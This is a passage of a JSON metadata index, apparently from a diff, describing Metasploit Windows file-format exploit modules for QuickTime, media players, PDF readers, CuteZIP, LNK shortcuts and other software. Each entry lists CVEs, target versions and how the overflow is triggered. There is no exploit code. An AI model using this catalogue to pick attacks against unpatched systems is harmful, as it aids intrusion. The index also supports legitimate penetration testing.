"fullname": "exploit/windows/fileformat/apple_quicktime_rdrf", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-22", + "type": "exploit", + 
"author": [ + "Jason Kratzer", + "Tom Gallagher", + "Paul Bates", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Apple QuickTime. The flaw is\n triggered when QuickTime fails to properly handle the data length for certain\n atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer\n overflow by loading a specially crafted .mov file, and allows arbitrary\n code execution under the context of the current user. Please note: Since an egghunter\n is used to search for the payload, this may require additional time for\n the exploit to complete.", + "references": [ + "CVE-2013-1017", + "OSVDB-93625", + "BID-60097", + "URL-http://support.apple.com/kb/HT5770", + "ZDI-13-110" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Quicktime 7.7.0 - 7.7.3 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/apple_quicktime_rdrf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/apple_quicktime_texml": { + "name": "Apple QuickTime TeXML Style Element Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/apple_quicktime_texml", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-05-15", + "type": "exploit", + "author": [ + "Alexander Gavrun", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in Apple QuickTime. When handling\n a TeXML file, it is possible to trigger a stack-based buffer overflow, and then\n gain arbitrary code execution under the context of the user. 
This is due to the\n QuickTime3GPP.gtx component not handling certain Style subfields properly, storing\n user-supplied data on the stack, which results the overflow.", + "references": [ + "OSVDB-81934", + "CVE-2012-0663", + "BID-53571", + "ZDI-12-107", + "URL-http://0x1byte.blogspot.com/2012/06/cve-2012-0663-and-cve-2012-0664-samples.html", + "URL-http://support.apple.com/kb/HT1222" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "QuickTime 7.7.1 on Windows XP SP3", + "QuickTime 7.7.0 on Windows XP SP3", + "QuickTime 7.6.9 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/apple_quicktime_texml.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/apple_quicktime_texml", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/audio_coder_m3u": { + "name": "AudioCoder .M3U Buffer Overflow", + "fullname": "exploit/windows/fileformat/audio_coder_m3u", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-01", + "type": "exploit", + "author": [ + "metacom", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow in AudioCoder 0.8.18. The vulnerability\n occurs when adding an .m3u, allowing arbitrary code execution with the privileges\n of the user running AudioCoder. 
This module has been tested successfully on\n AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2017-8870", + "OSVDB-92939", + "EDB-25141" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/audio_coder_m3u.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/audio_coder_m3u", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/audio_wkstn_pls": { + "name": "Audio Workstation 6.4.2.4.3 pls Buffer Overflow", + "fullname": "exploit/windows/fileformat/audio_wkstn_pls", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-12-08", + "type": "exploit", + "author": [ + "germaya_x", + "dookie" + ], + "description": "This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.\n When opening a malicious pls file with the Audio Workstation,\n a remote attacker could overflow a buffer and execute\n arbitrary code.", + "references": [ + "CVE-2009-0476", + "OSVDB-55424", + "EDB-10353" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/audio_wkstn_pls.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/audio_wkstn_pls", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/audiotran_pls": { + "name": "Audiotran 1.4.1 (PLS File) Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/audiotran_pls", + "aliases": [], + "rank": 400, + 
"disclosure_date": "2010-01-09", + "type": "exploit", + "author": [ + "Sebastien Duquette", + "dookie" + ], + "description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.1.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Audiotran.\n This functionality has not been tested in this module.", + "references": [ + "CVE-2009-0476", + "OSVDB-55424", + "EDB-11079" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/audiotran_pls.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/audiotran_pls", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/audiotran_pls_1424": { + "name": "Audiotran PLS File Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/audiotran_pls_1424", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-09-09", + "type": "exploit", + "author": [ + "Philip OKeefe" + ], + "description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively, it may be possible to execute code remotely via an embedded\n PLS file within a browser when the PLS extension is registered to Audiotran.\n This alternate vector has not been tested and cannot be exercised directly\n with this module.", + "references": [ + "EDB-14961" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + 
"path": "/modules/exploits/windows/fileformat/audiotran_pls_1424.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/audiotran_pls_1424", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/aviosoft_plf_buf": { + "name": "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/aviosoft_plf_buf", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-11-09", + "type": "exploit", + "author": [ + "modpr0be", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Aviosoft Digital TV Player\n Pro version 1.x. An overflow occurs when the process copies the content of a\n playlist file on to the stack, which may result arbitrary code execution under\n the context of the user.", + "references": [ + "OSVDB-77043", + "EDB-18096" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Aviosoft DTV Player 1.0.1.2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/aviosoft_plf_buf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/bacnet_csv": { + "name": "BACnet OPC Client Buffer Overflow", + "fullname": "exploit/windows/fileformat/bacnet_csv", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-09-16", + "type": "exploit", + "author": [ + "Jeremy Brown", + "MC " + ], + "description": "This module exploits a stack buffer overflow in SCADA\n Engine BACnet OPC Client v1.0.24. 
When the BACnet OPC Client\n parses a specially crafted csv file, arbitrary code may be\n executed.", + "references": [ + "CVE-2010-4740", + "OSVDB-68096", + "BID-43289", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-264-01" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 English", + "Windows 2000 SP4 English" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/fileformat/bacnet_csv.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/bacnet_csv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/beetel_netconfig_ini_bof": { + "name": "Beetel Connection Manager NetConfig.ini Buffer Overflow", + "fullname": "exploit/windows/fileformat/beetel_netconfig_ini_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-12", + "type": "exploit", + "author": [ + "metacom", + "wvu " + ], + "description": "This module exploits a stack-based buffer overflow in Beetel Connection\n Manager. 
The vulnerability exists in the parsing of the UserName\n parameter in the NetConfig.ini file.\n\n The module has been tested successfully against version\n PCW_BTLINDV1.0.0B04 on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "OSVDB-98714", + "EDB-28969" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)" + ], + "mod_time": "2020-02-04 10:05:41 +0000", + "path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/beetel_netconfig_ini_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/blazedvd_hdtv_bof": { + "name": "BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability", + "fullname": "exploit/windows/fileformat/blazedvd_hdtv_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-04-03", + "type": "exploit", + "author": [ + "b33f", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in BlazeVideo HDTV Player's filename\n handling routine. When supplying a string of input data embedded in a .plf file,\n the MediaPlayerCtrl.dll component will try to extract a filename by using\n PathFindFileNameA(), and then copies whatever the return value is on the stack by\n using an inline strcpy. 
As a result, if this input data is long enough, it can cause\n a stack-based buffer overflow, which may lead to arbitrary code execution under the\n context of the user.", + "references": [ + "OSVDB-80896", + "EDB-18693", + "EDB-22931" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "BlazeVideo HDTV Player Pro v6.6.0.3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/blazedvd_hdtv_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/blazedvd_plf": { + "name": "BlazeDVD 6.1 PLF Buffer Overflow", + "fullname": "exploit/windows/fileformat/blazedvd_plf", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-08-03", + "type": "exploit", + "author": [ + "MC ", + "Deepak Rathore", + "Spencer McIntyre", + "Ken Smith" + ], + "description": "This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. 
When\n the application is used to open a specially crafted plf file,\n a buffer is overwritten allowing for the execution of arbitrary code.", + "references": [ + "CVE-2006-6199", + "EDB-32737", + "OSVDB-30770", + "BID-35918" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "BlazeDVD 6.2", + "BlazeDVD 5.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/blazedvd_plf.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/blazedvd_plf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/boxoft_wav_to_mp3": { + "name": "Boxoft WAV to MP3 Converter v1.1 Buffer Overflow", + "fullname": "exploit/windows/fileformat/boxoft_wav_to_mp3", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-08-31", + "type": "exploit", + "author": [ + "Robbie Corley", + "Shelby Pace" + ], + "description": "This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1.\n By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the\n application, a buffer is overwritten, which allows for running shellcode.", + "references": [ + "CVE-2015-7243", + "EDB-38035" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Boxoft WAV to MP3 Converter v1.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/boxoft_wav_to_mp3.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/boxoft_wav_to_mp3", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/fileformat/bpftp_client_bps_bof": { + "name": "BulletProof FTP Client BPS Buffer Overflow", + "fullname": "exploit/windows/fileformat/bpftp_client_bps_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-07-24", + "type": "exploit", + "author": [ + "Gabor Seljan" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n BulletProof FTP Client 2010, caused by an overly long hostname.\n\n By persuading the victim to open a specially-crafted .BPS file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3.", + "references": [ + "EDB-34162", + "EDB-34540", + "EDB-35449", + "OSVDB-109547", + "CVE-2014-2973" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/bpftp_client_bps_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/bsplayer_m3u": { + "name": "BS.Player 2.57 Buffer Overflow (Unicode SEH)", + "fullname": "exploit/windows/fileformat/bsplayer_m3u", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-01-07", + "type": "exploit", + "author": [ + "C4SS!0 G0M3S", + "Chris Gabriel" + ], + "description": "This module exploits a buffer overflow in BS.Player 2.57. 
When\n the playlist import is used to import a specially crafted m3u file,\n a buffer overflow occurs allowing arbitrary code execution.", + "references": [ + "OSVDB-82528", + "EDB-15934" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP", + "Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/bsplayer_m3u.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/bsplayer_m3u", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ca_cab": { + "name": "CA Antivirus Engine CAB Buffer Overflow", + "fullname": "exploit/windows/fileformat/ca_cab", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-06-05", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.\n By creating a specially crafted CAB file, an attacker may be able\n to execute arbitrary code.", + "references": [ + "CVE-2007-2864", + "OSVDB-35245", + "BID-24330", + "ZDI-07-035" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ca_cab.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ca_cab", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/cain_abel_4918_rdp": { + "name": "Cain and Abel RDP Buffer Overflow", + "fullname": "exploit/windows/fileformat/cain_abel_4918_rdp", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-11-30", + "type": "exploit", + 
"author": [ + "Trancek " + ], + "description": "This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24\n and below. An attacker must send the file to victim, and the victim must open\n the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.", + "references": [ + "CVE-2008-5405", + "OSVDB-50342", + "EDB-7329", + "BID-32543" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2 English", + "Windows XP SP0/1 English", + "Windows XP SP2 Spanish" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/cain_abel_4918_rdp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ccmplayer_m3u_bof": { + "name": "CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow", + "fullname": "exploit/windows/fileformat/ccmplayer_m3u_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-11-30", + "type": "exploit", + "author": [ + "Rh0" + ], + "description": "This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening\n a m3u playlist with a long track name, a SEH exception record can be overwritten\n with parts of the controllable buffer. 
SEH execution is triggered after an\n invalid read of an injectable address, thus allowing arbitrary code execution.\n This module works on multiple Windows platforms including: Windows XP SP3,\n Windows Vista, and Windows 7.", + "references": [ + "CVE-2011-5170", + "OSVDB-77453", + "EDB-18178" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "CCMPlayer 1.5" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ccmplayer_m3u_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/chasys_draw_ies_bmp_bof": { + "name": "Chasys Draw IES Buffer Overflow", + "fullname": "exploit/windows/fileformat/chasys_draw_ies_bmp_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-07-26", + "type": "exploit", + "author": [ + "Christopher Gabriel", + "Longinos Recuero Bustos", + "Javier 'soez'", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow vulnerability found in Chasys Draw IES\n (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while\n parsing BMP files, where the ReadFile function is used to store user provided data\n on the stack in an insecure way. It results in arbitrary code execution under the\n context of the user viewing a specially crafted BMP file. 
This module has been\n tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7\n SP1.", + "references": [ + "CVE-2013-3928", + "OSVDB-95689", + "BID-61463", + "URL-http://web.archive.org/web/20140326093457/http://secunia.com/advisories/53773/", + "URL-http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/chasys_draw_ies_bmp_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/coolpdf_image_stream_bof": { + "name": "Cool PDF Image Stream Buffer Overflow", + "fullname": "exploit/windows/fileformat/coolpdf_image_stream_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-18", + "type": "exploit", + "author": [ + "Francis Provencher", + "Chris Gabriel", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in Cool PDF Reader prior to version\n 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that\n contains a specially crafted image stream. 
This module has been tested successfully\n on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2012-4914", + "OSVDB-89349", + "EDB-24463", + "URL-http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=70&Itemid=70" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Cool PDF 3.0.2.256 / Windows 7 SP1 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/coolpdf_image_stream_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/corelpdf_fusion_bof": { + "name": "Corel PDF Fusion Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/corelpdf_fusion_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-07-08", + "type": "exploit", + "author": [ + "Kaveh Ghaemmaghami", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in version 1.11 of\n Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry\n names. In order for the payload to be executed, an attacker must convince the target\n user to open a specially crafted XPS file with Corel PDF Fusion. 
By doing so, the\n attacker can execute arbitrary code as the target user.", + "references": [ + "CVE-2013-3248", + "OSVDB-94933", + "BID-61010", + "URL-http://web.archive.org/web/20130720043800/http://secunia.com:80/advisories/52707/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Corel PDF Fusion 1.11 / Windows XP SP3" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/corelpdf_fusion_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/csound_getnum_bof": { + "name": "Csound hetro File Handling Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/csound_getnum_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-02-23", + "type": "exploit", + "author": [ + "Secunia", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow in Csound before 5.16.6.\n The overflow occurs when trying to import a malicious hetro file\n from tabular format.\n In order to achieve exploitation the user should import the malicious\n file through csound with a command like \"csound -U het_import msf.csd file.het\".\n This exploit doesn't work if the \"het_import\" command is used directly\n to convert the file.", + "references": [ + "CVE-2012-0270", + "OSVDB-79491", + "BID-52144", + "URL-http://web.archive.org/web/20120514124556/http://secunia.com/secunia_research/2012-3/", + "URL-http://csound.git.sourceforge.net/git/gitweb.cgi?p=csound/csound5.git;a=commit;h=7d617a9551fb6c552ba16874b71266fcd90f3a6f" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Csound 5.15 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": 
"2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/csound_getnum_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/csound_getnum_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/cutezip_bof": { + "name": "GlobalSCAPE CuteZIP Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/cutezip_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-02-12", + "type": "exploit", + "author": [ + "C4SS!0 G0M3S ", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in version 2.1\n of CuteZIP.\n\n In order for the command to be executed, an attacker must convince the target user\n to open a specially crafted zip file with CuteZIP. By doing so, an attacker can\n execute arbitrary code as the target user.", + "references": [ + "OSVDB-85709", + "EDB-16162", + "BID-46375" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "CuteZIP 2.1 / Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/cutezip_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/cutezip_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/cve_2017_8464_lnk_rce": { + "name": "LNK Code Execution Vulnerability", + "fullname": "exploit/windows/fileformat/cve_2017_8464_lnk_rce", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-06-13", + "type": "exploit", + "author": [ + "Uncredited", + "Yorick Koster", + "Spencer McIntyre" + ], + "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a 
malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n If no PATH is specified, the module will use drive letters D through Z so the files\n may be placed in the root path of a drive such as a shared VM folder or USB drive.", + "references": [ + "CVE-2017-8464", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464", + "URL-http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt", + "URL-https://msdn.microsoft.com/en-us/library/dd871305.aspx", + "URL-http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm", + "URL-https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows x64", + "Windows x86" + ], + "mod_time": "2023-03-13 10:31:27 +0000", + "path": "/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/cve_2017_8464_lnk_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-restarts" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/cyberlink_lpp_bof": { + "name": "CyberLink LabelPrint 2.5 Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/cyberlink_lpp_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-09-23", + "type": "exploit", + "author": [ + "modpr0be ", + "f3ci " + ], + "description": "This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.\n The 
vulnerability is triggered when opening a .lpp project file containing overly long string characters\n via open file menu. This results in overwriting a structured exception handler record and take over the\n application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).", + "references": [ + "CVE-2017-14627", + "EDB-42777" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "CyberLink LabelPrint <= 2.5 on Windows 7 (64 bit)", + "CyberLink LabelPrint <= 2.5 on Windows 8.1 x64", + "CyberLink LabelPrint <= 2.5 on Windows 10 x64 build 1803" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/cyberlink_lpp_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/cyberlink_p2g_bof": { + "name": "CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit", + "fullname": "exploit/windows/fileformat/cyberlink_p2g_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-09-12", + "type": "exploit", + "author": [ + "modpr0be ", + "mr_me " + ], + "description": "This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x\n The vulnerability is triggered when opening a malformed p2g file containing an overly\n long string in the 'name' attribute of the file element. 
